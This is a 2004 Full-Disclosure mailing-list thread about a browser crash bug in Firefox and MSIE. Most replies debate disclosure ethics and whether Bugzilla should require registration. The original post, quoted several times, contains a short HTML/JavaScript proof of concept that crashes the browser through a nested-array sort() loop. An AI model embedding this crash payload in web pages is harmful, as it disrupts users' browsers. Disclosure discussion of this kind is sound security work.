Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote:
> On Thu, 25 Nov 2004, Heikki Toivonen wrote:
> > 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account...
> > 4. Type in a valid email address and click Create Account
> > 5. [mail] Read email that was sent to the address to get password
> > 6. back on in the browser, click log in here
> > 7. fill in your username and password and click login
>
> [snip the rest of useful info on how to post good, healthy, actionable bug reports]
>
> requiring someone to register to post a bug is harmful in the sense that you wind up turning off people who simply can't be bothered to fill out that info or wish to remain anonymous.

Hence the [EMAIL PROTECTED] address. If you are anxious to get the bug fixed you have the option of filling out the form and thereby making yourself available for further questions, getting email with bug updates and the ability to submit coredumps and whatnot. If you're not so anxious you can simply send in an email and be content with having let them know about it.

Firefox still has the benefit of running on a multitude of platforms and architectures. Someone trying to exploit a vulnerability in it (as opposed to just crashing it) would have to know both to be successful.

> while i definitely see the benefit of forcing registration or even wanting it, i bet you're losing more bug reports than you care to imagine this way.

Perhaps the problem lies in the fact that the mozilla coders want people to use the forum so they don't promote the [EMAIL PROTECTED] mail address enough?

> benefits of forcing/encouraging registration include:
> - guaranteed line of followup
> - reduced spam quantities in bugzilla
> - at least a cutoff of i care enough to ...
>
> still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump. the security@ route is useful, and i'm glad you pointed it out.
>
> this point should be considered by anyone who runs a bug reporting page for open submissions, you may be doing more harm than benefit.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario [EMAIL PROTECTED] writes:
> requiring someone to register to post a bug is harmful in the sense that you wind up turning off people who simply can't be bothered to fill out that info

Exactly.

--
Esben Stien is [EMAIL PROTECTED]
http://www.esben-stien.name
irc://irc.esben-stien.name/%23contact
[sip|iax]:[EMAIL PROTECTED]
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote:
> benefits of forcing/encouraging registration include:
> - guaranteed line of followup
> - reduced spam quantities in bugzilla
> - at least a cutoff of i care enough to ...

Currently more than half of the bugs that do get filed end up wasting time rather than helping (duplicates, invalid, already fixed in a newer version, no one else can reproduce). These are not minor benefits, the situation would be far worse with drive-by bug reporting.

> still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump.

It is a real problem, knowing where to draw the line is hard. For people who don't wish to get as involved there are other places bugs could be reported more informally (newsgroups, web forums, irc) and other volunteers would most likely file the bugs for you if they can be reproduced.

http://www.mozilla.org/support/#community

-Dan Veditz
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Jose Nazario wrote:
> On Thu, 25 Nov 2004, Heikki Toivonen wrote:
> > 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account...
>
> requiring someone to register to post a bug is harmful in the sense that you wind up turning off people who simply can't be bothered to fill out that info or wish to remain anonymous.
>
> while i definitely see the benefit of forcing registration or even wanting it, i bet you're losing more bug reports than you care to imagine this way.

You won't be losing anonymity - just create a Bugzilla account on Yahoo! or some other free email service and use that for Bugzilla mail.

Your post also pointed out the benefits of requiring registration, and I think they far outweigh the possibility of some bug going unnoticed since it was not reported. If you receive a bug report but can't reproduce it, and you can't communicate with the reporter, you can't do anything but ignore that report. And if it was not important enough for anyone to register and file the bug, then maybe it wasn't important enough to fix.

But still, having said all this, the Mozilla Foundation is working on finding alternative ways for people to file bug reports, and make it easier.

--
Heikki Toivonen
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
On Thu, 25 Nov 2004, Heikki Toivonen wrote:
> 3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account...
> 4. Type in a valid email address and click Create Account
> 5. [mail] Read email that was sent to the address to get password
> 6. back on in the browser, click log in here
> 7. fill in your username and password and click login

[snip the rest of useful info on how to post good, healthy, actionable bug reports]

requiring someone to register to post a bug is harmful in the sense that you wind up turning off people who simply can't be bothered to fill out that info or wish to remain anonymous.

while i definitely see the benefit of forcing registration or even wanting it, i bet you're losing more bug reports than you care to imagine this way.

benefits of forcing/encouraging registration include:
- guaranteed line of followup
- reduced spam quantities in bugzilla
- at least a cutoff of i care enough to ...

still, you're losing more than you may expect. i know i've failed to file bug reports (non-security related) for mozilla products due to this speed bump. the security@ route is useful, and i'm glad you pointed it out.

this point should be considered by anyone who runs a bug reporting page for open submissions, you may be doing more harm than benefit.

jose nazario, ph.d. [EMAIL PROTECTED]
http://monkey.org/~jose/ http://infosecdaily.net/
RE: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
An email to [EMAIL PROTECTED] would have sufficed.

That email address can be found at http://www.mozilla.org/security/bug-bounty.html

Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

Hi all,

Same flaw works for Firefox as well as MSIE:

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
> So instead you unleash it upon kiddie and spammer world? That's lovely.
>
> Next you will come by again and say: I'm still hoping I get to see the guy who wrote those MyDoom worms in court, he violated the GPL and spread millions(?) of copies of my (modified) source).
>
> So, you release it like you did and, expect what? Some people are advocates of this or that disclosure mechanism, and believe they are right. I can bite. You just say: I'm so cool. I will release this, get a ton of attention and then say 'hey! They violated GPL! How dare they?!'
>
> Full disclosure. Responsible disclosure (according to whoever). Non-disclosure. Fine. What are you doing?

I agree, not to mention that that bugzilla crap is not really crap. I find it to be a solid system for the most part. Also, it has been proven that involving the general public to help out in filing bugs has been useful in resolving problems that would otherwise go unnoticed until script kiddies start abusing them. Plus bugzilla is not really that hard to use, takes just a few minutes really.

--
http://www.loconet.ca
RE: [Full-Disclosure] FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

Hi all,

Same flaw works for Firefox as well as MSIE:

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

Randall M
Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
Berend-Jan Wever wrote:
> I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.

Well, Mozilla does have a well-known security email alias for those who don't have the time to do a crash course on Bugzilla - see http://www.mozilla.org/projects/security/security-bugs-policy.html (but if you don't have time to visit that link, I'll save you the trouble and say it starts with [EMAIL PROTECTED])

Bugzilla really isn't that difficult either. Below are detailed instructions if anyone cares. Steps 4-6 you can ignore if you already have a Bugzilla account. Step 9 gives detailed info on what to fill in the actual bug reporting form. There are only two critically important pieces on that form: the details text box, and the security checkbox. However, carefully filling in as much information as you can will make it likelier the bug gets fixed faster.

1. Type bugzilla.mozilla.org in your browser's location bar and go there
2. Click the link: Report A Bug
3. Either login if you already have an account, or click create new account. Let's assume we need to create a new account...
4. Type in a valid email address and click Create Account
5. [mail] Read email that was sent to the address to get password
6. back on in the browser, click log in here
7. fill in your username and password and click login
8. Select product link, for example Firefox
9. there's a form to fill in, let's go this part over in detail since I think this is the scariest part:
   9.1 There is a search box, but if you are reporting a security bug in the latest product, chances are there are no dupes so just jump on over
   9.2 Select a component that you think most closely describes where the problem occurs - if you can't figure out, just choose something, for example General
   9.3 Hardware, operating system and build identifier are already filled in correctly for you if you are reporting the bug in the same product where you found it - if you can't figure these out, don't worry - just describe the stuff later on
   9.4 If you know a URL where this happens (for example a testcase), fill that in
   9.5 Give a brief summary
   9.6 The details are next - basically what you'd put in a vulnerability report email or post goes here
   9.7 Next it's going to ask even in more details, just to make sure the developers get all the info - if you already filled these parts in the details section, you can ignore them. The fields are: reproducibility, steps to reproduce, actual results, expected results, additional information
   9.8 IMPORTANT: Check that security box! This way your bug will get the speediest attention, and it will also restrict people's access to the bug until it is opened (either by you or someone else)
   9.9 lastly severity
10. Submit bug report, and you are done!

Then, whenever someone changes the bug, you will get an email of the changes with a link to the bug. People may ask you more questions etc. Commenting on the bug later on is trivial - just go to the URL (Bugzilla may ask you to login again), type in your comments in the Additional Comments textbox and hit the Commit button. There are a lot of other fields, but typically the developers and more experienced Bugzilla users will take care of changing those. At this point the bug basically resembles a normal web forum from user's point of view.

And if you really have the time, I recommend you go read the docs that are linked under the When reporting a bug section on https://bugzilla.mozilla.org/

--
Heikki Toivonen
Re: [Full-Disclosure] FIREFOX flaws: nested array sort()
Sounds like he does it For fun. That's what I'd do.

RandallM wrote:
> So, where do you all stand. Exploit for fame or for purpose?
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever
> Sent: 25 November 2004 01:05
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception
>
> Hi all,
>
> Same flaw works for Firefox as well as MSIE:
>
> <HTML>
> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
> </HTML>
>
> Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
>
> I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.
>
> Cheers,
> SkyLined
> http://www.edup.tudelft.nl/~bjwever
>
> Randall M